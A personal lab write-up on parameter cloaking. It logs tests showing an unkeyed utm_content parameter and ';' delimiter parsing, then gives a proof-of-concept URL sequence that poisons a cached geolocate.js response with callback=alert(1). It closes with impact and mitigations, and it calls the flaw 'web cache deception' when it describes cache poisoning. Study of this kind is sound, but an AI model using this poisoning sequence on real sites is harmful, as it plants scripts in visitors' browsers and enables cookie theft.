Note(Datetime, Name) : 2025-04-29 Parameter Cloaking

Metodelogy

  1. Investigate the system to retrieve a list of features
  2. Discribe the feature and explain how it works
  3. List possible vulnerabilities and group by feature
  4. Proof of concept for possible vulnerabilities
  5. What is the impact of the vulnerabilities after the proof of concept ?

==========================================================================================================

feature:

  1. access GET / -> Home page

steps taken:

  1. access /js/geolocate.js?callback=setCountryCookie -> confirm the page use geolocate.js and is cacheable and olso observed that the callback parameter is reflected
  2. access /js/geolocate.js?callback=setCountryCookie&utm_content=payload -> utm_content is added inside page cookie
  3. access /js/geolocate.js?callback%3dsetCountryCookie%26utm_content%3Dtest%26callback%3dtest -> recived response missing parameter callback
  4. access /js/geolocate.js?callback=setCountryCookie&utm_content=test=callback=test -> noting happened
  5. access /js/geolocate.js?callback=setCountryCookie&utm_content& -> confirm utm_content is an unkeyed cache parameter
  6. access /js/geolocate.js?callback=setCountryCookie&utm_content=test&callback=test&utm_content& -> cache miss occurred
  7. access /js/geolocate.js?callback=setCountryCookie&utm_content;callback=test -> cache miss occurred but the callback was changed to test, meaning the server interprets ';' as delimiter
  8. access /js/geolocate.js?callback=setCountryCookie&utm_content=;callback=test -> the second parameter is unkeyed and cacheable, only the first callback is properly keyed

vulnerabilities :

  1. web cache deception using UTM anlityics and the ';' separator for parameter parsing

Proof of concept:

  1. access /js/geolocate.js?callback=setCountryCookie and ensure this page is cacheable
  2. access /js/geolocate.js?callback=setCountryCookie&utm_content=;callback=alert(1) until got response header show cache:miss
  3. access /js/geolocate.js?callback=setCountryCookie&utm_content=;callback=alert(1) until got response header show cache:hit
  4. access / home -> an alert popup is shown on browser

impact

  1. an Attacker can inject script through the url and store it in cache server, allowing the attacker to execute scripts on the victim browser, potentially leading to cookie theft

takeaways

  1. ensure that every URL parameter is either properly for cache or if not needed , make the page not cacheable
  2. always sanitize inputs from url, enspecialy if the inputs are reflected an can trigger direct script execution.